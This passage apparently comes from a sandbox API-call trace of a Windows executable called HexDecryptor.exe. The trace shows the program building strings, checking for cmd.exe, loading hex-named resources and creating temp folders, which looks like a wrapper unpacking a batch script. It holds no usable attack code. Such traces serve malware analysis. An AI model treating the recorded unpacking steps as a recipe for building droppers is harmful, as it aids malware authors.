(dwErrCode=0x0) [0120.277] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.277] GetLastError () returned 0x0 [0120.277] SetLastError (dwErrCode=0x0) [0120.277] wcslen (_String="b2eincfilecou") returned 0xd [0120.277] wcslen (_String="n") returned 0x1 [0120.277] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x26) returned 0x23e04d0 [0120.277] GetLastError () returned 0x0 [0120.277] SetLastError (dwErrCode=0x0) [0120.277] GetLastError () returned 0x0 [0120.278] SetLastError (dwErrCode=0x0) [0120.278] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.278] GetLastError () returned 0x0 [0120.278] SetLastError (dwErrCode=0x0) [0120.278] wcslen (_String="b2eincfilecoun") returned 0xe [0120.278] wcslen (_String="t") returned 0x1 [0120.278] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e04d0, Size=0x28) returned 0x23e04d0 [0120.278] GetLastError () returned 0x0 [0120.278] SetLastError (dwErrCode=0x0) [0120.278] GetLastError () returned 0x0 [0120.278] SetLastError (dwErrCode=0x0) [0120.278] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.278] GetLastError () returned 0x0 [0120.278] SetLastError (dwErrCode=0x0) [0120.278] wcslen (_String="b") returned 0x1 [0120.278] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e77e0 [0120.278] GetLastError () returned 0x0 [0120.278] SetLastError (dwErrCode=0x0) [0120.278] GetLastError () returned 0x0 [0120.278] SetLastError (dwErrCode=0x0) [0120.462] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.462] GetLastError () returned 0x0 [0120.462] SetLastError (dwErrCode=0x0) [0120.462] wcslen (_String="b") returned 0x1 [0120.463] wcslen (_String="2") returned 0x1 [0120.463] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77e0, Size=0xe) returned 0x23e76f0 [0120.463] GetLastError () returned 0x0 [0120.463] SetLastError (dwErrCode=0x0) [0120.463] GetLastError () returned 0x0 [0120.463] SetLastError (dwErrCode=0x0) [0120.463] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.463] GetLastError () returned 0x0 [0120.463] SetLastError (dwErrCode=0x0) [0120.463] wcslen (_String="b2") returned 0x2 [0120.463] wcslen (_String="e") returned 0x1 [0120.463] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76f0, Size=0x10) returned 0x23e7750 [0120.463] GetLastError () returned 0x0 [0120.463] SetLastError (dwErrCode=0x0) [0120.463] GetLastError () returned 0x0 [0120.463] SetLastError (dwErrCode=0x0) [0120.464] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.464] GetLastError () returned 0x0 [0120.464] SetLastError (dwErrCode=0x0) [0120.464] wcslen (_String="b2e") returned 0x3 [0120.464] wcslen (_String="i") returned 0x1 [0120.464] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7750, Size=0x12) returned 0x23e0500 [0120.464] GetLastError () returned 0x0 [0120.464] SetLastError (dwErrCode=0x0) [0120.464] GetLastError () returned 0x0 [0120.464] SetLastError (dwErrCode=0x0) [0120.464] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.464] GetLastError () returned 0x0 [0120.464] SetLastError (dwErrCode=0x0) [0120.464] wcslen (_String="b2ei") returned 0x4 [0120.464] wcslen (_String="n") returned 0x1 [0120.464] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e0500, Size=0x14) returned 0x23e0500 [0120.464] GetLastError () returned 0x0 [0120.465] SetLastError (dwErrCode=0x0) [0120.465] GetLastError () returned 0x0 [0120.465] SetLastError (dwErrCode=0x0) [0120.465] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.465] GetLastError () returned 0x0 [0120.465] SetLastError (dwErrCode=0x0) [0120.465] wcslen (_String="b2ein") returned 0x5 [0120.465] wcslen (_String="c") returned 0x1 [0120.465] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e0500, Size=0x16) returned 0x23e0500 [0120.465] GetLastError () returned 0x0 [0120.465] SetLastError (dwErrCode=0x0) [0120.465] GetLastError () returned 0x0 [0120.465] SetLastError (dwErrCode=0x0) [0120.465] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.465] GetLastError () returned 0x0 [0120.465] SetLastError (dwErrCode=0x0) [0120.466] wcslen (_String="b2einc") returned 0x6 [0120.466] wcslen (_String="f") returned 0x1 [0120.466] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e0500, Size=0x18) returned 0x23e0500 [0120.466] GetLastError () returned 0x0 [0120.466] SetLastError (dwErrCode=0x0) [0120.466] GetLastError () returned 0x0 [0120.466] SetLastError (dwErrCode=0x0) [0120.466] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.466] GetLastError () returned 0x0 [0120.466] SetLastError (dwErrCode=0x0) [0120.466] wcslen (_String="b2eincf") returned 0x7 [0120.466] wcslen (_String="i") returned 0x1 [0120.466] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e0500, Size=0x1a) returned 0x23e0500 [0120.466] GetLastError () returned 0x0 [0120.466] SetLastError (dwErrCode=0x0) [0120.466] GetLastError () returned 0x0 [0120.468] SetLastError (dwErrCode=0x0) [0120.468] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.468] GetLastError () returned 0x0 [0120.468] SetLastError (dwErrCode=0x0) [0120.468] wcslen (_String="b2eincfi") returned 0x8 [0120.468] wcslen (_String="l") returned 0x1 [0120.468] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e0500, Size=0x1c) returned 0x23e0500 [0120.468] GetLastError () returned 0x0 [0120.468] SetLastError (dwErrCode=0x0) [0120.468] GetLastError () returned 0x0 [0120.468] SetLastError (dwErrCode=0x0) [0120.469] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.469] GetLastError () returned 0x0 [0120.469] SetLastError (dwErrCode=0x0) [0120.469] wcslen (_String="b2eincfil") returned 0x9 [0120.469] wcslen (_String="e") returned 0x1 [0120.469] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e0500, Size=0x1e) returned 0x23e0500 [0120.469] GetLastError () returned 0x0 [0120.469] SetLastError (dwErrCode=0x0) [0120.469] GetLastError () returned 0x0 [0120.469] SetLastError (dwErrCode=0x0) [0120.469] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.469] GetLastError () returned 0x0 [0120.469] SetLastError (dwErrCode=0x0) [0120.469] wcslen (_String="E") returned 0x1 [0120.469] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e7798 [0120.469] GetLastError () returned 0x0 [0120.470] SetLastError (dwErrCode=0x0) [0120.470] GetLastError () returned 0x0 [0120.470] SetLastError (dwErrCode=0x0) [0120.470] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.470] GetLastError () returned 0x0 [0120.470] SetLastError (dwErrCode=0x0) [0120.470] wcslen (_String="E") returned 0x1 [0120.470] wcslen (_String="r") returned 0x1 [0120.470] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7798, Size=0xe) returned 0x23e76d8 [0120.470] GetLastError () returned 0x0 [0120.470] SetLastError (dwErrCode=0x0) [0120.470] GetLastError () returned 0x0 [0120.470] SetLastError (dwErrCode=0x0) [0120.470] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.470] GetLastError () returned 0x0 [0120.470] SetLastError (dwErrCode=0x0) [0120.470] wcslen (_String="Er") returned 0x2 [0120.471] wcslen (_String="r") returned 0x1 [0120.471] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76d8, Size=0x10) returned 0x23e7750 [0120.471] GetLastError () returned 0x0 [0120.471] SetLastError (dwErrCode=0x0) [0120.471] GetLastError () returned 0x0 [0120.471] SetLastError (dwErrCode=0x0) [0120.471] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.471] GetLastError () returned 0x0 [0120.471] SetLastError (dwErrCode=0x0) [0120.471] wcslen (_String="Err") returned 0x3 [0120.471] wcslen (_String="o") returned 0x1 [0120.471] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7750, Size=0x12) returned 0x23e7cf0 [0120.472] GetLastError () returned 0x0 [0120.472] SetLastError (dwErrCode=0x0) [0120.472] GetLastError () returned 0x0 [0120.472] SetLastError (dwErrCode=0x0) [0120.472] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.472] GetLastError () returned 0x0 [0120.472] SetLastError (dwErrCode=0x0) [0120.472] wcslen (_String="Erro") returned 0x4 [0120.472] wcslen (_String="r") returned 0x1 [0120.472] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7cf0, Size=0x14) returned 0x23e7e90 [0120.472] GetLastError () returned 0x0 [0120.472] SetLastError (dwErrCode=0x0) [0120.472] GetLastError () returned 0x0 [0120.472] SetLastError (dwErrCode=0x0) [0120.473] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.473] GetLastError () returned 0x0 [0120.473] SetLastError (dwErrCode=0x0) [0120.473] wcslen (_String="e") returned 0x1 [0120.473] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e7828 [0120.473] GetLastError () returned 0x0 [0120.473] SetLastError (dwErrCode=0x0) [0120.473] GetLastError () returned 0x0 [0120.473] SetLastError (dwErrCode=0x0) [0120.473] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.473] GetLastError () returned 0x0 [0120.473] SetLastError (dwErrCode=0x0) [0120.473] wcslen (_String="e") returned 0x1 [0120.473] wcslen (_String="x") returned 0x1 [0120.473] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7828, Size=0xe) returned 0x23e7780 [0120.473] GetLastError () returned 0x0 [0120.474] SetLastError (dwErrCode=0x0) [0120.474] GetLastError () returned 0x0 [0120.474] SetLastError (dwErrCode=0x0) [0120.474] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.474] GetLastError () returned 0x0 [0120.474] SetLastError (dwErrCode=0x0) [0120.474] wcslen (_String="ex") returned 0x2 [0120.474] wcslen (_String="t") returned 0x1 [0120.474] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7780, Size=0x10) returned 0x23e7738 [0120.474] GetLastError () returned 0x0 [0120.474] SetLastError (dwErrCode=0x0) [0120.474] GetLastError () returned 0x0 [0120.474] SetLastError (dwErrCode=0x0) [0120.474] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.474] GetLastError () returned 0x0 [0120.474] SetLastError (dwErrCode=0x0) [0120.474] wcslen (_String="ext") returned 0x3 [0120.474] wcslen (_String="d") returned 0x1 [0120.474] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7738, Size=0x12) returned 0x23e7d70 [0120.475] wcslen (_String="extd") returned 0x4 [0120.476] wcslen (_String=".exe") returned 0x4 [0120.476] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7d70, Size=0x1a) returned 0x23e0528 [0120.476] wcslen (_String="cmd") returned 0x3 [0120.476] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x10) returned 0x23e7780 [0120.476] wcslen (_String=".exe") returned 0x4 [0120.476] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x12) returned 0x23e7fd0 [0120.476] GetNativeSystemInfo (in: lpSystemInfo=0x19fee8 | out: lpSystemInfo=0x19fee8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0120.476] GetVersionExW (in: lpVersionInformation=0x19fbc4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xea0001eb, dwMinorVersion=0x10, dwBuildNumber=0x8, dwPlatformId=0x9929bde8, szCSDVersion="\x05") | out: lpVersionInformation=0x19fbc4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0120.477] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77970000 [0120.477] GetProcAddress (hModule=0x77970000, lpProcName="RtlGetVersion") returned 0x7799fff0 [0120.477] RtlGetVersion (in: lpVersionInformation=0x19fcd8 | out: lpVersionInformation=0x19fcd8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0120.477] GetLastError () returned 0x0 [0120.477] SetLastError (dwErrCode=0x0) [0120.477] GetLastError () returned 0x0 [0120.478] SetLastError (dwErrCode=0x0) [0120.478] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x100a) returned 0x23e8090 [0120.478] GetWindowsDirectoryW (in: lpBuffer=0x23e8090, uSize=0x800 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0120.478] PathAddBackslashW (in: pszPath="C:\\WINDOWS" | out: pszPath="C:\\WINDOWS\\") returned="" [0120.478] GetLastError () returned 0x0 [0120.479] SetLastError (dwErrCode=0x0) [0120.479] wcslen (_String="C:\\WINDOWS\\") returned 0xb [0120.479] wcslen (_String="sysnative") returned 0x9 [0120.479] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e8090, Size=0x32) returned 0x23e8090 [0120.479] PathAddBackslashW (in: pszPath="C:\\WINDOWS\\sysnative" | out: pszPath="C:\\WINDOWS\\sysnative\\") returned="" [0120.479] GetLastError () returned 0x0 [0120.479] SetLastError (dwErrCode=0x0) [0120.479] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0120.479] wcslen (_String="cmd") returned 0x3 [0120.479] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x3a) returned 0x23e0550 [0120.479] GetLastError () returned 0x0 [0120.479] SetLastError (dwErrCode=0x0) [0120.479] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0120.479] wcslen (_String="cmd") returned 0x3 [0120.479] wcslen (_String=".exe") returned 0x4 [0120.479] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x42) returned 0x23e80d0 [0120.480] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0x20) returned 0x2201088 [0120.480] CreateFileW (lpFileName="C:\\WINDOWS\\sysnative\\cmd" (normalized: "c:\\windows\\sysnative\\cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0120.480] CreateFileW (lpFileName="C:\\WINDOWS\\sysnative\\cmd.exe" (normalized: "c:\\windows\\sysnative\\cmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0120.480] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x1000) returned 0x22010b0 [0120.481] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.481] CloseHandle (hObject=0x230) returned 1 [0120.481] GetLastError () returned 0x0 [0120.481] SetLastError (dwErrCode=0x0) [0120.481] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0120.481] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e80d0 | out: hHeap=0x23e0000) returned 1 [0120.481] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e7780 | out: hHeap=0x23e0000) returned 1 [0120.481] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e7fd0 | out: hHeap=0x23e0000) returned 1 [0120.481] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e8090 | out: hHeap=0x23e0000) returned 1 [0120.482] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e0550 | out: hHeap=0x23e0000) returned 1 [0120.482] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x34) returned 0x23e0550 [0120.482] GetCommandLineW () returned="HexDecryptor.exe " [0120.482] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0120.482] GetLastError () returned 0x0 [0120.482] SetLastError (dwErrCode=0x0) [0120.482] GetLastError () returned 0x0 [0120.482] SetLastError (dwErrCode=0x0) [0120.482] GetLastError () returned 0x0 [0120.482] SetLastError (dwErrCode=0x0) [0120.482] GetLastError () returned 0x0 [0120.482] SetLastError (dwErrCode=0x0) [0120.482] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x9c) returned 0x22010b0 [0120.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0120.482] malloc (_Size=0x22) returned 0x8c26c0 [0120.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=33, lpMultiByteStr=0x8c26c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="52DF72526B67A203B121748B4B6B4E52", lpUsedDefaultChar=0x0) returned 33 [0120.482] free (_Block=0x8c26c0) [0120.483] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.483] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23e8090 [0120.483] GetLastError () returned 0x0 [0120.483] SetLastError (dwErrCode=0x0) [0120.483] GetLastError () returned 0x0 [0120.483] SetLastError (dwErrCode=0x0) [0120.483] GetLastError () returned 0x0 [0120.483] SetLastError (dwErrCode=0x0) [0120.483] GetLastError () returned 0x0 [0120.483] SetLastError (dwErrCode=0x0) [0120.483] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x9c) returned 0x22010b0 [0120.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EBA7866A99CCAECAA170E46C3E4F0F2C", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0120.483] malloc (_Size=0x22) returned 0x8c26c0 [0120.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EBA7866A99CCAECAA170E46C3E4F0F2C", cchWideChar=33, lpMultiByteStr=0x8c26c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EBA7866A99CCAECAA170E46C3E4F0F2C", lpUsedDefaultChar=0x0) returned 33 [0120.483] free (_Block=0x8c26c0) [0120.483] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.484] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e8090, Size=0x4a) returned 0x23e8090 [0120.484] wcslen (_String="507F43385DDDE7C4FA4D672FE1359C71") returned 0x20 [0120.484] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23e80e8 [0120.485] FindResourceW (hModule=0x400000, lpName="507F43385DDDE7C4FA4D672FE1359C71", lpType=0xa) returned 0x419260 [0120.485] LoadResource (hModule=0x400000, hResInfo=0x419260) returned 0x43244c [0120.485] SizeofResource (hModule=0x400000, hResInfo=0x419260) returned 0xe [0120.485] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0xe) returned 0x8905a8 [0120.485] FreeResource (hResData=0x43244c) returned 0 [0120.485] RtlSizeHeap (HeapHandle=0x890000, Flags=0x0, MemoryPointer=0x8905a8) returned 0xe [0120.485] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x200) returned 0x8905c0 [0120.485] malloc (_Size=0x1bcc) returned 0x8c26c0 [0120.485] free (_Block=0x8c26c0) [0120.485] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e80e8 | out: hHeap=0x23e0000) returned 1 [0120.485] GetLastError () returned 0x0 [0120.485] SetLastError (dwErrCode=0x0) [0120.485] GetLastError () returned 0x0 [0120.486] SetLastError (dwErrCode=0x0) [0120.486] GetLastError () returned 0x0 [0120.486] SetLastError (dwErrCode=0x0) [0120.486] GetLastError () returned 0x0 [0120.486] SetLastError (dwErrCode=0x0) [0120.486] GetLastError () returned 0x0 [0120.486] SetLastError (dwErrCode=0x0) [0120.486] GetLastError () returned 0x0 [0120.486] SetLastError (dwErrCode=0x0) [0120.486] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e7768 [0120.486] GetLastError () returned 0x0 [0120.486] SetLastError (dwErrCode=0x0) [0120.486] wcslen (_String=".") returned 0x1 [0120.486] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e77e0 [0120.486] GetLastError () returned 0x0 [0120.486] SetLastError (dwErrCode=0x0) [0120.486] GetLastError () returned 0x0 [0120.486] SetLastError (dwErrCode=0x0) [0120.487] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7768, Size=0xc) returned 0x23e77c8 [0120.487] GetLastError () returned 0x0 [0120.487] SetLastError (dwErrCode=0x0) [0120.487] wcslen (_String=".") returned 0x1 [0120.487] wcslen (_String="b") returned 0x1 [0120.487] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77e0, Size=0xe) returned 0x23e7828 [0120.487] GetLastError () returned 0x0 [0120.487] SetLastError (dwErrCode=0x0) [0120.487] GetLastError () returned 0x0 [0120.487] SetLastError (dwErrCode=0x0) [0120.487] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77c8, Size=0xc) returned 0x23e7810 [0120.487] GetLastError () returned 0x0 [0120.487] SetLastError (dwErrCode=0x0) [0120.487] wcslen (_String=".b") returned 0x2 [0120.487] wcslen (_String="a") returned 0x1 [0120.487] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7828, Size=0x10) returned 0x23e76d8 [0120.488] GetLastError () returned 0x0 [0120.488] SetLastError (dwErrCode=0x0) [0120.488] GetLastError () returned 0x0 [0120.488] SetLastError (dwErrCode=0x0) [0120.488] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7810, Size=0xc) returned 0x23e76c0 [0120.488] GetLastError () returned 0x0 [0120.488] SetLastError (dwErrCode=0x0) [0120.488] wcslen (_String=".ba") returned 0x3 [0120.488] wcslen (_String="t") returned 0x1 [0120.488] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76d8, Size=0x12) returned 0x23e7ed0 [0120.488] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x400) returned 0x8907c8 [0120.488] GetLastError () returned 0x0 [0120.488] SetLastError (dwErrCode=0x0) [0120.488] GetLastError () returned 0x0 [0120.488] SetLastError (dwErrCode=0x0) [0120.488] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x23e0608 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0120.488] LoadLibraryW (lpLibFileName="Kernel32.DLL") returned 0x772d0000 [0120.489] GetProcAddress (hModule=0x772d0000, lpProcName="GetLongPathNameW") returned 0x77311710 [0120.489] GetLongPathNameW (in: lpszShortPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpszLongPath=0x23e0608, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0120.490] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.490] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x50) returned 0x23e80e8 [0120.491] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x8907c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp")) returned 0x4ad5 [0120.492] GetLastError () returned 0x0 [0120.492] SetLastError (dwErrCode=0x0) [0120.492] GetLastError () returned 0x0 [0120.492] SetLastError (dwErrCode=0x0) [0120.492] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x60) returned 0x23e8140 [0120.492] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp")) returned 1 [0120.493] wcsncpy (in: _Dest=0x19fd0c, _Source="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp", _Count=0x104 | out: _Dest="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp" [0120.493] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp") returned 0x2b [0120.493] CreateDirectoryW (lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp"), lpSecurityAttributes=0x0) returned 1 [0120.493] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp", lpPrefixString="", uUnique=0x0, lpTempFileName=0x8907c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp")) returned 0x4ad6 [0120.494] GetLastError () returned 0x0 [0120.494] SetLastError (dwErrCode=0x0) [0120.494] GetLastError () returned 0x0 [0120.494] SetLastError (dwErrCode=0x0) [0120.494] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x72) returned 0x23e81a8 [0120.494] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp")) returned 1 [0120.495] wcsncpy (in: _Dest=0x19fd0c, _Source="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp", _Count=0x104 | out: _Dest="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp" [0120.495] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp") returned 0x34 [0120.495] CreateDirectoryW (lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp"), lpSecurityAttributes=0x0) returned 1 [0120.495] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp", lpPrefixString="", uUnique=0x0, 